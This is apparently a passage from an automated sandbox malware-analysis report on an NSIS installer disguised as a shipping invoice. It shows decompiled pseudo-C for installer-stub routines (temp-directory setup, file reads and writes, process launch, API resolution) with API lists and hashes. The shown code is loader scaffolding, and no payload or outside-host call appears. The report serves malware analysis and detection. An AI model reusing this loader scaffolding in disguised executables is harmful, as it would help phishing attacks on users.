                                                                                                                                    						_t21 =  *_t32;
                                                                                                                                    						 *_t32 = _t26;
                                                                                                                                    						 *((char*)(_t33 + 0xb)) = _t21;
                                                                                                                                    						if(_t21 != _t26) {
                                                                                                                                    							L5:
                                                                                                                                    							_t22 = E004057D0(_t28);
                                                                                                                                    						} else {
                                                                                                                                    							_t39 =  *((intOrPtr*)(_t33 - 0x2c)) - _t26;
                                                                                                                                    							if( *((intOrPtr*)(_t33 - 0x2c)) == _t26 || E004057ED(_t39) == 0) {
                                                                                                                                    								goto L5;
                                                                                                                                    							} else {
                                                                                                                                    								_t22 = E00405753(_t28);
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						if(_t22 != _t26) {
                                                                                                                                    							if(_t22 != 0xb7) {
                                                                                                                                    								L9:
                                                                                                                                    								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                                                                                                                                    							} else {
                                                                                                                                    								_t24 = GetFileAttributesA(_t28); // executed
                                                                                                                                    								if((_t24 & 0x00000010) == 0) {
                                                                                                                                    									goto L9;
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						_t23 =  *((intOrPtr*)(_t33 + 0xb));
                                                                                                                                    						 *_t32 = _t23;
                                                                                                                                    						_t30 = _t32 + 1;
                                                                                                                                    					} while (_t23 != _t26);
                                                                                                                                    				}
                                                                                                                                    				if( *((intOrPtr*)(_t33 - 0x30)) == _t26) {
                                                                                                                                    					_push(0xfffffff5);
                                                                                                                                    					E00401423();
                                                                                                                                    				} else {
                                                                                                                                    					E00401423(0xffffffe6);
                                                                                                                                    					E00406166("C:\\Users\\jones\\AppData\\Local\\Temp", _t28);
                                                                                                                                    					_t19 = SetCurrentDirectoryA(_t28); // executed
                                                                                                                                    					if(_t19 == 0) {
                                                                                                                                    						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t33 - 4));
                                                                                                                                    				return 0;
                                                                                                                                    			}














                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00405B97: CharNextA.USER32(?,?,0042BCA0,?,00405C03,0042BCA0,0042BCA0,73BCFA90,?,73BCF560,0040594E,?,73BCFA90,73BCF560,00000000), ref: 00405BA5
                                                                                                                                      • Part of subcall function 00405B97: CharNextA.USER32(00000000), ref: 00405BAA
                                                                                                                                      • Part of subcall function 00405B97: CharNextA.USER32(00000000), ref: 00405BBE
                                                                                                                                    • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                                                                                                      • Part of subcall function 00405753: CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405796
                                                                                                                                    • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 0040163C
                                                                                                                                    Strings
                                                                                                                                    • C:\Users\user\AppData\Local\Temp, xrefs: 00401631
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp
                                                                                                                                    • API String ID: 1892508949-47812868
                                                                                                                                    • Opcode ID: 8acca499171d81bb2f3419eb941c7a60e200e9b6c8983b01d4d8df19a581cb41
                                                                                                                                    • Instruction ID: 535c21b7702f059b1d7074ae51545e7eff56296ea4168573509253bf270d0845
                                                                                                                                    • Opcode Fuzzy Hash: 8acca499171d81bb2f3419eb941c7a60e200e9b6c8983b01d4d8df19a581cb41
                                                                                                                                    • Instruction Fuzzy Hash: 26112331508140EBCB213FB55D419BF36B0AE96324F68453FE4D2B32E2D63C4942AA3E
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00405805(CHAR* _a4) {
                                                                                                                                    				struct _PROCESS_INFORMATION _v20;
                                                                                                                                    				int _t7;
                                                                                                                                    
                                                                                                                                    				0x42c0a0->cb = 0x44;
                                                                                                                                    				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x42c0a0,  &_v20); // executed
                                                                                                                                    				if(_t7 != 0) {
                                                                                                                                    					CloseHandle(_v20.hThread);
                                                                                                                                    					return _v20.hProcess;
                                                                                                                                    				}
                                                                                                                                    				return _t7;
                                                                                                                                    			}






                                                                                                                                    APIs
                                                                                                                                    • CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,0042C0A0,Error launching installer), ref: 0040582E
                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0040583B
                                                                                                                                    Strings
                                                                                                                                    • Error launching installer, xrefs: 00405818
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseCreateHandleProcess
                                                                                                                                    • String ID: Error launching installer
                                                                                                                                    • API String ID: 3712363035-66219284
                                                                                                                                    • Opcode ID: 421f809f28bca1f98b20e550836f3007b7b9bd60f9fc0af0ac10e5b082a614fb
                                                                                                                                    • Instruction ID: ef60985b0a8e60c0cc21645a7d93756c68bcebacb0ea3173ad9c7233b8f40f6f
                                                                                                                                    • Opcode Fuzzy Hash: 421f809f28bca1f98b20e550836f3007b7b9bd60f9fc0af0ac10e5b082a614fb
                                                                                                                                    • Instruction Fuzzy Hash: 8EE09AB5600209BFEB109BA4ED45F7B76ADEB04608F404425BD11E6151D77498158A78
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00406573(void* __ecx, void* _a4) {
                                                                                                                                    				long _v8;
                                                                                                                                    				long _t6;
                                                                                                                                    
                                                                                                                                    				_t6 = WaitForSingleObject(_a4, 0x64);
                                                                                                                                    				while(_t6 == 0x102) {
                                                                                                                                    					E0040653A(0xf);
                                                                                                                                    					_t6 = WaitForSingleObject(_a4, 0x64);
                                                                                                                                    				}
                                                                                                                                    				GetExitCodeProcess(_a4,  &_v8); // executed
                                                                                                                                    				return _v8;
                                                                                                                                    			}






                                                                                                                                    APIs
                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000064), ref: 00406584
                                                                                                                                    • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00406599
                                                                                                                                    • GetExitCodeProcess.KERNELBASE ref: 004065A6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ObjectSingleWait$CodeExitProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2567322000-0
                                                                                                                                    • Opcode ID: 8b3662556466c7a9aa9287d1dd3e0430d3586ccd5a047112670a1d7cd9fe4626
                                                                                                                                    • Instruction ID: 9a6e2dc2ccd47f310a317adcf38ee21a53a295a8560cc61b0a390025f0c3ae06
                                                                                                                                    • Opcode Fuzzy Hash: 8b3662556466c7a9aa9287d1dd3e0430d3586ccd5a047112670a1d7cd9fe4626
                                                                                                                                    • Instruction Fuzzy Hash: 16E0D831600118FBDB009F44ED01E9E7B6EEB44754F118037FA06B61D1D7B19E21DBA8
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00403891() {
                                                                                                                                    				void* _t1;
                                                                                                                                    				void* _t2;
                                                                                                                                    				signed int _t11;
                                                                                                                                    
                                                                                                                                    				_t1 =  *0x40a018; // 0xffffffff
                                                                                                                                    				if(_t1 != 0xffffffff) {
                                                                                                                                    					CloseHandle(_t1);
                                                                                                                                    					 *0x40a018 =  *0x40a018 | 0xffffffff;
                                                                                                                                    				}
                                                                                                                                    				_t2 =  *0x40a01c; // 0xffffffff
                                                                                                                                    				if(_t2 != 0xffffffff) {
                                                                                                                                    					CloseHandle(_t2);
                                                                                                                                    					 *0x40a01c =  *0x40a01c | 0xffffffff;
                                                                                                                                    					_t11 =  *0x40a01c;
                                                                                                                                    				}
                                                                                                                                    				E004038EE();
                                                                                                                                    				return E0040592E(_t11, 0x436800, 7);
                                                                                                                                    			}







                                                                                                                                    APIs
                                                                                                                                    • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,004036C8,?,?,00000006,00000008,0000000A), ref: 004038A3
                                                                                                                                    • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,004036C8,?,?,00000006,00000008,0000000A), ref: 004038B7
                                                                                                                                    Strings
                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00403896
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseHandle
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                    • API String ID: 2962429428-3081826266
                                                                                                                                    • Opcode ID: f4883823afded9b7982d5ce8aa361b7af30e4f5c6102247c0ba02c17078a5cb8
                                                                                                                                    • Instruction ID: e2e60a7fa285321dbf32492e456ea5b7930b3da47de0ecd5afd05a55b0c9860b
                                                                                                                                    • Opcode Fuzzy Hash: f4883823afded9b7982d5ce8aa361b7af30e4f5c6102247c0ba02c17078a5cb8
                                                                                                                                    • Instruction Fuzzy Hash: AAE04F3140071496C5247F78AE495853A595B413317208776B034F20F0C63899565AAD
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 53%
                                                                                                                                    			E00405BEC(void* __eflags, intOrPtr _a4) {
                                                                                                                                    				int _t11;
                                                                                                                                    				signed char* _t12;
                                                                                                                                    				long _t16;
                                                                                                                                    				intOrPtr _t18;
                                                                                                                                    				intOrPtr* _t21;
                                                                                                                                    				void* _t22;
                                                                                                                                    
                                                                                                                                    				E00406166(0x42bca0, _a4);
                                                                                                                                    				_t21 = E00405B97(0x42bca0);
                                                                                                                                    				if(_t21 != 0) {
                                                                                                                                    					E004063D0(_t21);
                                                                                                                                    					if(( *0x42f43c & 0x00000080) == 0) {
                                                                                                                                    						L5:
                                                                                                                                    						_t22 = _t21 - 0x42bca0;
                                                                                                                                    						while(1) {
                                                                                                                                    							_t11 = lstrlenA(0x42bca0);
                                                                                                                                    							_push(0x42bca0);
                                                                                                                                    							if(_t11 <= _t22) {
                                                                                                                                    								break;
                                                                                                                                    							}
                                                                                                                                    							_t12 = E00406469();
                                                                                                                                    							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
                                                                                                                                    								E00405B45(0x42bca0);
                                                                                                                                    								continue;
                                                                                                                                    							} else {
                                                                                                                                    								goto L1;
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						E00405AFE();
                                                                                                                                    						_t16 = GetFileAttributesA(??); // executed
                                                                                                                                    						return 0 | _t16 != 0xffffffff;
                                                                                                                                    					}
                                                                                                                                    					_t18 =  *_t21;
                                                                                                                                    					if(_t18 == 0 || _t18 == 0x5c) {
                                                                                                                                    						goto L1;
                                                                                                                                    					} else {
                                                                                                                                    						goto L5;
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    				L1:
                                                                                                                                    				return 0;
                                                                                                                                    			}










                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00406166: lstrcpynA.KERNEL32(?,?,00000400,0040347B,Unbound Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00406173
                                                                                                                                      • Part of subcall function 00405B97: CharNextA.USER32(?,?,0042BCA0,?,00405C03,0042BCA0,0042BCA0,73BCFA90,?,73BCF560,0040594E,?,73BCFA90,73BCF560,00000000), ref: 00405BA5
                                                                                                                                      • Part of subcall function 00405B97: CharNextA.USER32(00000000), ref: 00405BAA
                                                                                                                                      • Part of subcall function 00405B97: CharNextA.USER32(00000000), ref: 00405BBE
                                                                                                                                    • lstrlenA.KERNEL32(0042BCA0,00000000,0042BCA0,0042BCA0,73BCFA90,?,73BCF560,0040594E,?,73BCFA90,73BCF560,00000000), ref: 00405C3F
                                                                                                                                    • GetFileAttributesA.KERNELBASE(0042BCA0,0042BCA0,0042BCA0,0042BCA0,0042BCA0,0042BCA0,00000000,0042BCA0,0042BCA0,73BCFA90,?,73BCF560,0040594E,?,73BCFA90,73BCF560), ref: 00405C4F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3248276644-0
                                                                                                                                    • Opcode ID: 12d052b06ecefcd6606f27144e7bbfa3c3d14b32aee028dc0343ede84df2c329
                                                                                                                                    • Instruction ID: 2a59b109aead3482dcfafb4db46a255f05312d8e2ec5276b7002a83cdbe31f2e
                                                                                                                                    • Opcode Fuzzy Hash: 12d052b06ecefcd6606f27144e7bbfa3c3d14b32aee028dc0343ede84df2c329
                                                                                                                                    • Instruction Fuzzy Hash: 1DF0F435108F6516E232223A1D05A9F1A54CE43364706053FF851B22D3EB3C88429EBE
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 59%
                                                                                                                                    			E00401389(signed int _a4, struct HWND__* _a11) {
                                                                                                                                    				intOrPtr* _t6;
                                                                                                                                    				void* _t8;
                                                                                                                                    				void* _t10;
                                                                                                                                    				signed int _t11;
                                                                                                                                    				void* _t12;
                                                                                                                                    				signed int _t16;
                                                                                                                                    				signed int _t17;
                                                                                                                                    
                                                                                                                                    				_t17 = _a4;
                                                                                                                                    				while(_t17 >= 0) {
                                                                                                                                    					_t6 = _t17 * 0x1c +  *0x42f470;
                                                                                                                                    					if( *_t6 == 1) {
                                                                                                                                    						break;
                                                                                                                                    					}
                                                                                                                                    					_push(_t6); // executed
                                                                                                                                    					_t8 = E00401434(); // executed
                                                                                                                                    					if(_t8 == 0x7fffffff) {
                                                                                                                                    						return 0x7fffffff;
                                                                                                                                    					}
                                                                                                                                    					_t10 = E0040136D(_t8);
                                                                                                                                    					if(_t10 != 0) {
                                                                                                                                    						_t11 = _t10 - 1;
                                                                                                                                    						_t16 = _t17;
                                                                                                                                    						_t17 = _t11;
                                                                                                                                    						_t12 = _t11 - _t16;
                                                                                                                                    					} else {
                                                                                                                                    						_t12 = _t10 + 1;
                                                                                                                                    						_t17 = _t17 + 1;
                                                                                                                                    					}
                                                                                                                                    					if(_a11 != 0) {
                                                                                                                                    						 *0x42ec0c =  *0x42ec0c + _t12;
                                                                                                                                    						SendMessageA(_a11, 0x402, MulDiv( *0x42ec0c, 0x7530,  *0x42ebf4), 0);
                                                                                                                                    					}
                                                                                                                                    				}
                                                                                                                                    				return 0;
                                                                                                                                    			}











                                                                                                                                    APIs
                                                                                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                    • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                    • Opcode ID: 4caf53cf22bbe872b770c3f3fbbc44c84797692dd5fc93fbf8fc3fb0002ab025
                                                                                                                                    • Instruction ID: 7cdeea9b0131a57a15ac7f6c1e434deeaa3b569f473f58ba5ecd54f98bc9db7f
                                                                                                                                    • Opcode Fuzzy Hash: 4caf53cf22bbe872b770c3f3fbbc44c84797692dd5fc93fbf8fc3fb0002ab025
                                                                                                                                    • Instruction Fuzzy Hash: 1801F4317202209BE7195B79DD08B6A3698E710718F50823FF851F61F1DA78DC038B4D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E004064FE(signed int _a4) {
                                                                                                                                    				struct HINSTANCE__* _t5;
                                                                                                                                    				signed int _t10;
                                                                                                                                    
                                                                                                                                    				_t10 = _a4 << 3;
                                                                                                                                    				_t8 =  *(_t10 + 0x40a258);
                                                                                                                                    				_t5 = GetModuleHandleA( *(_t10 + 0x40a258));
                                                                                                                                    				if(_t5 != 0) {
                                                                                                                                    					L2:
                                                                                                                                    					return GetProcAddress(_t5,  *(_t10 + 0x40a25c));
                                                                                                                                    				}
                                                                                                                                    				_t5 = E00406490(_t8); // executed
                                                                                                                                    				if(_t5 == 0) {
                                                                                                                                    					return 0;
                                                                                                                                    				}
                                                                                                                                    				goto L2;
                                                                                                                                    			}






                                                                                                                                    APIs
                                                                                                                                    • GetModuleHandleA.KERNEL32(?,?,?,0040341C,0000000A), ref: 00406510
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0040652B
                                                                                                                                      • Part of subcall function 00406490: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004064A7
                                                                                                                                      • Part of subcall function 00406490: wsprintfA.USER32 ref: 004064E0
                                                                                                                                      • Part of subcall function 00406490: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2547128583-0
                                                                                                                                    • Opcode ID: 7c71ba34a6a15a08903817672089decd904bf369f5f8bc3590889e9149a18620
                                                                                                                                    • Instruction ID: 458cda3b533da5e0d65103126bb9241e04dc97badc687d1fb794b71832f36866
                                                                                                                                    • Opcode Fuzzy Hash: 7c71ba34a6a15a08903817672089decd904bf369f5f8bc3590889e9149a18620
                                                                                                                                    • Instruction Fuzzy Hash: A0E0863260421066D6106774BD0482763E89FC5B00302443EF546F2144E7389C31966D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                    			E00405CFF(CHAR* _a4, long _a8, long _a12) {
                                                                                                                                    				signed int _t5;
                                                                                                                                    				void* _t6;
                                                                                                                                    
                                                                                                                                    				_t5 = GetFileAttributesA(_a4); // executed
                                                                                                                                    				asm("sbb ecx, ecx");
                                                                                                                                    				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                                                                                                    				return _t6;
                                                                                                                                    			}






                                                                                                                                    APIs
                                                                                                                                    • GetFileAttributesA.KERNELBASE(00000003,00402E57,C:\Users\user\Desktop\Shipping INVOICE-BL Shipment..exe,80000000,00000003), ref: 00405D03
                                                                                                                                    • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D25
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Similarity
                                                                                                                                    • API ID: File$AttributesCreate
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 415043291-0
                                                                                                                                    • Opcode ID: a0ef3aabf8739962215ab3b029b3a8460f23d0e56d3659f47e9d959f4e092221
                                                                                                                                    • Instruction ID: 44ec1511c7d75563636feacf23b0872b92cf9f9cc06fc18b7ec6e669f43cef59
                                                                                                                                    • Opcode Fuzzy Hash: a0ef3aabf8739962215ab3b029b3a8460f23d0e56d3659f47e9d959f4e092221
                                                                                                                                    • Instruction Fuzzy Hash: E4D09E71654201AFEF098F20DE16F2EBAA2EB84B00F11952CB682944E1DA715819AB19
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00405CDA(CHAR* _a4) {
                                                                                                                                    				signed char _t3;
                                                                                                                                    				signed char _t7;
                                                                                                                                    
                                                                                                                                    				_t3 = GetFileAttributesA(_a4); // executed
                                                                                                                                    				_t7 = _t3;
                                                                                                                                    				if(_t7 != 0xffffffff) {
                                                                                                                                    					SetFileAttributesA(_a4, _t3 & 0x000000fe);
                                                                                                                                    				}
                                                                                                                                    				return _t7;
                                                                                                                                    			}






                                                                                                                                    APIs
                                                                                                                                    • GetFileAttributesA.KERNELBASE(?,?,004058F2,?,?,00000000,00405AD5,?,?,?,?), ref: 00405CDF
                                                                                                                                    • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405CF3
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AttributesFile
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                    • Opcode ID: a53a5738952024e77fe51bdf82e6835a24f68a8863f167a8e3b3ad13dd9f075c
                                                                                                                                    • Instruction ID: 9949a295f96e8328a39f1aa706882c5bfe6c67e515388db15e08be4317e2d048
                                                                                                                                    • Opcode Fuzzy Hash: a53a5738952024e77fe51bdf82e6835a24f68a8863f167a8e3b3ad13dd9f075c
                                                                                                                                    • Instruction Fuzzy Hash: 14D02232004030AFC2002728EF0C88BBF51DB40370702CB35FEA5A22F0CB310C129A98
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E004057D0(CHAR* _a4) {
                                                                                                                                    				int _t2;
                                                                                                                                    
                                                                                                                                    				_t2 = CreateDirectoryA(_a4, 0); // executed
                                                                                                                                    				if(_t2 == 0) {
                                                                                                                                    					return GetLastError();
                                                                                                                                    				}
                                                                                                                                    				return 0;
                                                                                                                                    			}





                                                                                                                                    APIs
                                                                                                                                    • CreateDirectoryA.KERNELBASE(?,00000000,0040339C,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035BB,?,00000006,00000008,0000000A), ref: 004057D6
                                                                                                                                    • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 004057E4
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.687997408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688007258.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688011398.000000000040A000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688017881.0000000000416000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688023516.000000000041F000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688029516.000000000042C000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688033305.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                                                    • Associated: 00000000.00000002.688037464.000000000043F000.00000002.00020000.sdmp Download File
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1375471231-0
                                                                                                                                    • Opcode ID: 6906a218f2e8c60edb1d49339bec002b269bb684b810150c6462e9a7ab2278e9
                                                                                                                                    • Instruction ID: 7917fbb3929a9c129cc829dd55927f4d0611b804e73fbe07aaab10779adde687
                                                                                                                                    • Opcode Fuzzy Hash: 6906a218f2e8c60edb1d49339bec002b269bb684b810150c6462e9a7ab2278e9
                                                                                                                                    • Instruction Fuzzy Hash: 7DC04C30215A01DADA505F31DF18717BA55BB64741F11443AA146E60E0DA348415E92D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00405D77(void* _a4, void* _a8, long _a12) {
                                                                                                                                    				int _t7;
                                                                                                                                    				long _t11;
                                                                                                                                    
                                                                                                                                    				_t11 = _a12;
                                                                                                                                    				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                                                                                    				if(_t7 == 0 || _t11 != _a12) {
                                                                                                                                    					return 0;
                                                                                                                                    				} else {
                                                                                                                                    					return 1;
                                                                                                                                    				}
                                                                                                                                    			}






                                                                                                                                    APIs
                                                                                                                                    • ReadFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,0041D440,00415440,0040335E,0040A130,0040A130,00403262,0041D440,00004000,?,00000000,0040310C), ref: 00405D8B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.688001359.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileRead
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                    • Opcode ID: e23cbb0757ad9fa8c6c9682000f81612da8d127e18228ddbd7f099cf91b7f4dd
                                                                                                                                    • Instruction ID: 851e167300276639316dcfef42321f21f919bee8e2bb8d874df264e532a52d6d
                                                                                                                                    • Opcode Fuzzy Hash: e23cbb0757ad9fa8c6c9682000f81612da8d127e18228ddbd7f099cf91b7f4dd
                                                                                                                                    • Instruction Fuzzy Hash: 87E08C3221025EABCF119FA08C04EEB3B6CEF00360F008433FD21E7080D630E9209BA8
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E00405DA6(void* _a4, void* _a8, long _a12) {
                                                                                                                                    				int _t7;
                                                                                                                                    				long _t11;
                                                                                                                                    
                                                                                                                                    				_t11 = _a12;
                                                                                                                                    				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                                                                                    				if(_t7 == 0 || _t11 != _a12) {
                                                                                                                                    					return 0;
                                                                                                                                    				} else {
                                                                                                                                    					return 1;
                                                                                                                                    				}
                                                                                                                                    			}






